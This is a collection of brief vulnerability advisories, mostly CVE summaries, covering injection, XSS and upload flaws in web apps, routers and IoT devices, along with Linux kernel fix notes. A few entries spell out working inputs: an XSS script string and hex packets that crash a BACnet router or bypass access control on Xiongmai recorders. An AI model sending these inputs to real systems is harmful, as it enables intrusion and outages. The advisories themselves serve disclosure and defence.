A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /view/teacher_salary_details3.php. The manipulation of the argument month leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263123.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /view/teacher_salary_invoice.php. The manipulation of the argument desc leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263122 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /view/teacher_salary_invoice1.php. The manipulation of the argument date leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263121 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /view/timetable.php. The manipulation of the argument grade leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263120.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /view/timetable_grade_wise.php. The manipulation of the argument grade leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263119.
A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/timetable_insert_form.php. The manipulation of the argument grade leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263118 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/timetable_update_form.php. The manipulation of the argument grade leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263117 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Prison Management System 1.0. This vulnerability affects unknown code of the file /Employee/edit-profile.php. The manipulation of the argument txtfullname/txtdob/txtaddress/txtqualification/cmddept/cmdemployeetype/txtappointment leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263116.
A vulnerability classified as critical has been found in Shanghai Sunfull Automation BACnet Server HMI1002-ARM 2.0.4. This affects an unknown part of the component Message Handler. The manipulation leads to buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263115. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/networkConfig/ArpTable/arp_add_commit.php. The manipulation of the argument text_ip_addr/text_mac_addr leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263114 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/IPV6/naborTable/add_commit.php. The manipulation of the argument ip_addr/mac_addr leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263113 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been classified as critical. Affected is an unknown function of the file /view/IPV6/ipv6StaticRoute/static_route_edit_ipv6.php. The manipulation of the argument oldipmask/oldgateway/olddevname leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263112. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240428 and classified as critical. This issue affects some unknown processing of the file /view/IPV6/ipv6StaticRoute/static_route_add_ipv6.php. The manipulation of the argument text_prefixlen/text_gateway/devname leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263111. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Ruijie RG-UAC up to 20240428 and classified as critical. This vulnerability affects unknown code of the file /view/IPV6/ipv6Addr/ip_addr_edit_commit.php. The manipulation of the argument text_ip_addr/orgprelen/orgname leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263110 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Ruijie RG-UAC up to 20240428. This affects an unknown part of the file /view/IPV6/ipv6Addr/ip_addr_add_commit.php. The manipulation of the argument prelen/ethname leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263109 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240428. Affected by this issue is some unknown functionality of the file /view/HAconfig/baseConfig/commit.php. The manipulation of the argument peer_ip/local_ip leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263108. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Ruijie RG-UAC up to 20240428. Affected by this vulnerability is an unknown functionality of the file /view/dhcp/dhcpConfig/dhcp_relay_commit.php. The manipulation of the argument interface_from leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263107. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Ruijie RG-UAC up to 20240428. Affected is an unknown function of the file /view/dhcp/dhcpClient/dhcp_client_commit.php. The manipulation of the argument ifName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263106 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-UAC up to 20240428. It has been rated as critical. This issue affects some unknown processing of the file /view/bugSolve/captureData/commit.php. The manipulation of the argument tcpDump leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263105 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Employee/edit-photo.php. The manipulation of the argument userImage leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263104.
The Post and Page Builder by BoldGrid &amp;#8211; Visual Drag and Drop Editor plguin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 1.26.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
A vulnerability has been found in SourceCodester Pisay Online E-Learning System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /lesson/controller.php. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262489 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-262488. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Apryse WebViewer up to 10.8.0. It has been classified as problematic. This affects an unknown part of the component PDF Document Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.9 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-262419. NOTE: The vendor was contacted early about this disclosure and explains that the documentation recommends a strict Content Security Policy and the issue was fixed in release 10.9.
A vulnerability, which was classified as critical, has been found in PHPGurukul Doctor Appointment Management System 1.0. Affected by this issue is some unknown functionality of the file /doctor/view-appointment-detail.php. The manipulation of the argument editid leads to improper control of resource identifiers. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-262226 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in PHPGurukul Doctor Appointment Management System 1.0. Affected by this vulnerability is an unknown functionality of the file appointment-bwdates-reports-details.php. The manipulation of the argument fromdate/todate leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262225 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Contemporary Controls BASrouter BACnet BASRT-B 2.7.2. Affected is an unknown function of the component Device-Communication-Control Service. The manipulation with the input 55ff0500370015f30104025506110afb7519035d0841e4bece257b6acfc71f leads to denial of service. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-262224. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262149 was assigned to this vulnerability.
A vulnerability was found in Techkshetra Info Solutions Savsoft Quiz 6.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /public/index.php/Qbank/editCategory of the component Category Page. The manipulation of the argument category_name with the input &gt;&lt;script&gt;alert('XSS')&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-262148. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240419. This issue affects some unknown processing of the file /view/network Config/GRE/gre_edit_commit.php. The manipulation of the argument name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262145 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Netgear DG834Gv5 1.6.01.34. This vulnerability affects unknown code of the component Web Management Interface. The manipulation leads to cleartext storage of sensitive information. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-262126 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Validate passed in drm syncobj handles in the timestamp extension If userspace provides an unknown or invalid handle anywhere in the handle array the rest of the driver will not handle that well. Fix it by checking handle was looked up successfully or otherwise fail the extension by jumping into the existing unwind. (cherry picked from commit 8d1276d1b8f738c3afe1457d4dff5cc66fc848a3)
In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Validate passed in drm syncobj handles in the performance extension If userspace provides an unknown or invalid handle anywhere in the handle array the rest of the driver will not handle that well. Fix it by checking handle was looked up successfully or otherwise fail the extension by jumping into the existing unwind. (cherry picked from commit a546b7e4d73c23838d7e4d2c92882b3ca902d213)
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Skip finding free audio for unknown engine_id [WHY] ENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it also means it is uninitialized and does not need free audio. [HOW] Skip and return NULL. This fixes 2 OVERRUN issues reported by Coverity.
Zitadel is an open source identity management system. ZITADEL administrators can enable a setting called "Ignoring unknown usernames" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report "Username or Password invalid". Due to a implementation change to prevent deadlocks calling the database, the flag would not be correctly respected in all cases and an attacker would gain information if an account exist within ZITADEL, since the error message shows "object not found" instead of the generic error message. This vulnerability is fixed in 2.58.1, 2.57.1, 2.56.2, 2.55.5, 2.54.8, and 2.53.9.
A vulnerability classified as problematic was found in idcCMS 1.35. Affected by this vulnerability is an unknown functionality of the file /admin/admin_cl.php?mudi=revPwd. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261991.
In the Linux kernel, the following vulnerability has been resolved: batman-adv: bypass empty buckets in batadv_purge_orig_ref() Many syzbot reports are pointing to soft lockups in batadv_purge_orig_ref() [1] Root cause is unknown, but we can avoid spending too much time there and perhaps get more interesting reports. [1] watchdog: BUG: soft lockup - CPU#0 stuck for 27s! [kworker/u4:6:621] Modules linked in: irq event stamp: 6182794 hardirqs last enabled at (6182793): [&lt;ffff8000801dae10&gt;] __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386 hardirqs last disabled at (6182794): [&lt;ffff80008ad66a78&gt;] __el1_irq arch/arm64/kernel/entry-common.c:533 [inline] hardirqs last disabled at (6182794): [&lt;ffff80008ad66a78&gt;] el1_interrupt+0x24/0x68 arch/arm64/kernel/entry-common.c:551 softirqs last enabled at (6182792): [&lt;ffff80008aab71c4&gt;] spin_unlock_bh include/linux/spinlock.h:396 [inline] softirqs last enabled at (6182792): [&lt;ffff80008aab71c4&gt;] batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287 softirqs last disabled at (6182790): [&lt;ffff80008aab61dc&gt;] spin_lock_bh include/linux/spinlock.h:356 [inline] softirqs last disabled at (6182790): [&lt;ffff80008aab61dc&gt;] batadv_purge_orig_ref+0x164/0x1228 net/batman-adv/originator.c:1271 CPU: 0 PID: 621 Comm: kworker/u4:6 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024 Workqueue: bat_events batadv_purge_orig pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : should_resched arch/arm64/include/asm/preempt.h:79 [inline] pc : __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:388 lr : __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386 sp : ffff800099007970 x29: ffff800099007980 x28: 1fffe00018fce1bd x27: dfff800000000000 x26: ffff0000d2620008 x25: ffff0000c7e70de8 x24: 0000000000000001 x23: 1fffe00018e57781 x22: dfff800000000000 x21: ffff80008aab71c4 x20: ffff0001b40136c0 x19: ffff0000c72bbc08 x18: 1fffe0001a817bb0 x17: ffff800125414000 x16: ffff80008032116c x15: 0000000000000001 x14: 1fffe0001ee9d610 x13: 0000000000000000 x12: 0000000000000003 x11: 0000000000000000 x10: 0000000000ff0100 x9 : 0000000000000000 x8 : 00000000005e5789 x7 : ffff80008aab61dc x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000000006 x1 : 0000000000000080 x0 : ffff800125414000 Call trace: __daif_local_irq_enable arch/arm64/include/asm/irqflags.h:27 [inline] arch_local_irq_enable arch/arm64/include/asm/irqflags.h:49 [inline] __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:386 __raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline] _raw_spin_unlock_bh+0x3c/0x4c kernel/locking/spinlock.c:210 spin_unlock_bh include/linux/spinlock.h:396 [inline] batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287 batadv_purge_orig+0x20/0x70 net/batman-adv/originator.c:1300 process_one_work+0x694/0x1204 kernel/workqueue.c:2633 process_scheduled_works kernel/workqueue.c:2706 [inline] worker_thread+0x938/0xef4 kernel/workqueue.c:2787 kthread+0x288/0x310 kernel/kthread.c:388 ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860 Sending NMI from CPU 0 to CPUs 1: NMI backtrace for cpu 1 CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024 pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : arch_local_irq_enable+0x8/0xc arch/arm64/include/asm/irqflags.h:51 lr : default_idle_call+0xf8/0x128 kernel/sched/idle.c:103 sp : ffff800093a17d30 x29: ffff800093a17d30 x28: dfff800000000000 x27: 1ffff00012742fb4 x26: ffff80008ec9d000 x25: 0000000000000000 x24: 0000000000000002 x23: 1ffff00011d93a74 x22: ffff80008ec9d3a0 x21: 0000000000000000 x20: ffff0000c19dbc00 x19: ffff8000802d0fd8 x18: 1fffe00036804396 x17: ffff80008ec9d000 x16: ffff8000802d089c x15: 0000000000000001 ---truncated---
A vulnerability, which was classified as critical, was found in SourceCodester Simple Subscription Website 1.0. Affected is an unknown function of the file view_application.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261822 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. This affects an unknown part of the file login.php. The manipulation of the argument txtAddress leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261801 was assigned to this vulnerability.
A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file prodInfo.php. The manipulation of the argument prodId leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261800.
A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file prodList.php. The manipulation of the argument prodType leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261799.
A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. It has been classified as problematic. Affected is an unknown function of the file search.php. The manipulation of the argument txtSearch leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261798 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0 and classified as critical. This issue affects some unknown processing of the file prodInfo.php. The manipulation of the argument prodId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261797 was assigned to this vulnerability.
A vulnerability has been found in Kashipara Online Furniture Shopping Ecommerce Website 1.0 and classified as critical. This vulnerability affects unknown code of the file prodList.php. The manipulation of the argument prodType leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261796.
A vulnerability, which was classified as critical, was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0. This affects an unknown part of the file search.php. The manipulation of the argument txtSearch leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261795.
A vulnerability was found in EZVIZ CS-C6-21WFR-8 5.2.7 Build 170628. It has been classified as problematic. This affects an unknown part of the component Davinci Application. The manipulation leads to improper certificate validation. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The identifier VDB-261789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Hualai Xiaofang iSC5 3.2.2_112 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improper certificate validation. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-261788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Keenetic KN-1010, KN-1410, KN-1711, KN-1810 and KN-1910 up to 4.1.2.15. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /version.js of the component Version Data Handler. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-261674 is the identifier assigned to this vulnerability. NOTE: The vendor is aware of this issue and plans to fix it by the end of 2024.
A vulnerability was found in Keenetic KN-1010, KN-1410, KN-1711, KN-1810 and KN-1910 up to 4.1.2.15. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /ndmComponents.js of the component Configuration Setting Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261673 was assigned to this vulnerability. NOTE: The vendor is aware of this issue and plans to fix it by the end of 2024.
A vulnerability classified as critical has been found in Byzoro Smart S80 Management Platform up to 20240411. Affected is an unknown function of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in COVESA vsomeip up to 3.4.10. Affected by this issue is some unknown functionality. The manipulation leads to race condition. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261596.
A vulnerability was found in SourceCodester Home Clean Service System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file \admin\student.add.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261440.
In the Linux kernel, the following vulnerability has been resolved: io_uring: check for non-NULL file pointer in io_file_can_poll() In earlier kernels, it was possible to trigger a NULL pointer dereference off the forced async preparation path, if no file had been assigned. The trace leading to that looks as follows: BUG: kernel NULL pointer dereference, address: 00000000000000b0 PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP CPU: 67 PID: 1633 Comm: buf-ring-invali Not tainted 6.8.0-rc3+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 2/2/2022 RIP: 0010:io_buffer_select+0xc3/0x210 Code: 00 00 48 39 d1 0f 82 ae 00 00 00 48 81 4b 48 00 00 01 00 48 89 73 70 0f b7 50 0c 66 89 53 42 85 ed 0f 85 d2 00 00 00 48 8b 13 &lt;48&gt; 8b 92 b0 00 00 00 48 83 7a 40 00 0f 84 21 01 00 00 4c 8b 20 5b RSP: 0018:ffffb7bec38c7d88 EFLAGS: 00010246 RAX: ffff97af2be61000 RBX: ffff97af234f1700 RCX: 0000000000000040 RDX: 0000000000000000 RSI: ffff97aecfb04820 RDI: ffff97af234f1700 RBP: 0000000000000000 R08: 0000000000200030 R09: 0000000000000020 R10: ffffb7bec38c7dc8 R11: 000000000000c000 R12: ffffb7bec38c7db8 R13: ffff97aecfb05800 R14: ffff97aecfb05800 R15: ffff97af2be5e000 FS: 00007f852f74b740(0000) GS:ffff97b1eeec0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000000b0 CR3: 000000016deab005 CR4: 0000000000370ef0 Call Trace: &lt;TASK&gt; ? __die+0x1f/0x60 ? page_fault_oops+0x14d/0x420 ? do_user_addr_fault+0x61/0x6a0 ? exc_page_fault+0x6c/0x150 ? asm_exc_page_fault+0x22/0x30 ? io_buffer_select+0xc3/0x210 __io_import_iovec+0xb5/0x120 io_readv_prep_async+0x36/0x70 io_queue_sqe_fallback+0x20/0x260 io_submit_sqes+0x314/0x630 __do_sys_io_uring_enter+0x339/0xbc0 ? __do_sys_io_uring_register+0x11b/0xc50 ? vm_mmap_pgoff+0xce/0x160 do_syscall_64+0x5f/0x180 entry_SYSCALL_64_after_hwframe+0x46/0x4e RIP: 0033:0x55e0a110a67e Code: ba cc 00 00 00 45 31 c0 44 0f b6 92 d0 00 00 00 31 d2 41 b9 08 00 00 00 41 83 e2 01 41 c1 e2 04 41 09 c2 b8 aa 01 00 00 0f 05 &lt;c3&gt; 90 89 30 eb a9 0f 1f 40 00 48 8b 42 20 8b 00 a8 06 75 af 85 f6 because the request is marked forced ASYNC and has a bad file fd, and hence takes the forced async prep path. Current kernels with the request async prep cleaned up can no longer hit this issue, but for ease of backporting, let's add this safety check in here too as it really doesn't hurt. For both cases, this will inevitably end with a CQE posted with -EBADF.
A vulnerability classified as problematic has been found in Totara LMS 18.0.1 Build 20231128.01. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261369 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Totara LMS 18.0.1 Build 20231128.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file admin/roles/check.php of the component Profile Handler. The manipulation of the argument ID Number leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Dromara open-capacity-platform 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /actuator/heapdump of the component auth-server. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261367.
A vulnerability was found in SMI SMI-EX-5414W up to 1.0.03. It has been classified as problematic. This affects an unknown part of the component Web Interface. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260907.
A vulnerability, which was classified as critical, has been found in Vesystem Cloud Desktop up to 20240408. This issue affects some unknown processing of the file /Public/webuploader/0.1.5/server/fileupload2.php. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Vesystem Cloud Desktop up to 20240408. This vulnerability affects unknown code of the file /Public/webuploader/0.1.5/server/fileupload.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260776. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-bookmark.php?bookmark=1. The manipulation of the argument bookmark leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260764.
A vulnerability was found in PHPGurukul Student Record System 3.20 and classified as critical. Affected by this issue is some unknown functionality of the file /edit-subject.php. The manipulation of the argument sub1/sub2/sub3/sub4/udate leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260618 is the identifier assigned to this vulnerability.
A vulnerability has been found in PHPGurukul Student Record System 3.20 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage-courses.php?del=1. The manipulation of the argument del leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260617 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul Student Record System 3.20. Affected is an unknown function of the file /login.php. The manipulation of the argument id/password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260616.
A vulnerability, which was classified as critical, has been found in PHPGurukul/itsourcecode News Portal 4.1. This issue affects some unknown processing of the file search.php. The manipulation of the argument searchtitle leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260615.
A vulnerability classified as critical was found in PHPGurukul News Portal 4.1. This vulnerability affects unknown code of the file /admin/edit-post.php. The manipulation of the argument posttitle leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-260614 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in slowlyo OwlAdmin up to 3.5.7. Affected by this issue is some unknown functionality of the file /admin-api/upload_image of the component Image File Upload. The manipulation of the argument file leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260606 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Xiongmai AHB7804R-MH-V2, AHB8004T-GL, AHB8008T-GL, AHB7004T-GS-V3, AHB7004T-MHV2, AHB8032F-LME and XM530_R80X30-PQ_8M. Affected by this vulnerability is an unknown functionality of the component Sofia Service. The manipulation with the input ff00000000000000000000000000f103250000007b202252657422203a203130302c202253657373696f6e494422203a202230783022207d0a leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260605 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
** DISPUTED ** A vulnerability classified as problematic has been found in Tuya SDK up to 5.0.x. Affected is an unknown function of the component MQTT Packet Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 5.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-260604. NOTE: The vendor explains that a malicious actor would have to crack TLS first or use a legitimate login to initiate the attack.
A vulnerability was found in Emlog Pro 2.2.10. It has been rated as problematic. This issue affects some unknown processing of the file /admin/tag.php of the component Post Tag Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260603. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Emlog Pro 2.2.10. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/twitter.php of the component Whisper Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-260602 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in cym1102 nginxWebUI up to 3.9.9. This vulnerability affects unknown code of the file /adminPage/main/upload. The manipulation of the argument file leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-260578 is the identifier assigned to this vulnerability.
A vulnerability was found in Smart Office up to 20240405. It has been classified as problematic. Affected is an unknown function of the file Main.aspx. The manipulation of the argument New Password/Confirm Password with the input 1 leads to weak password requirements. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-260574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
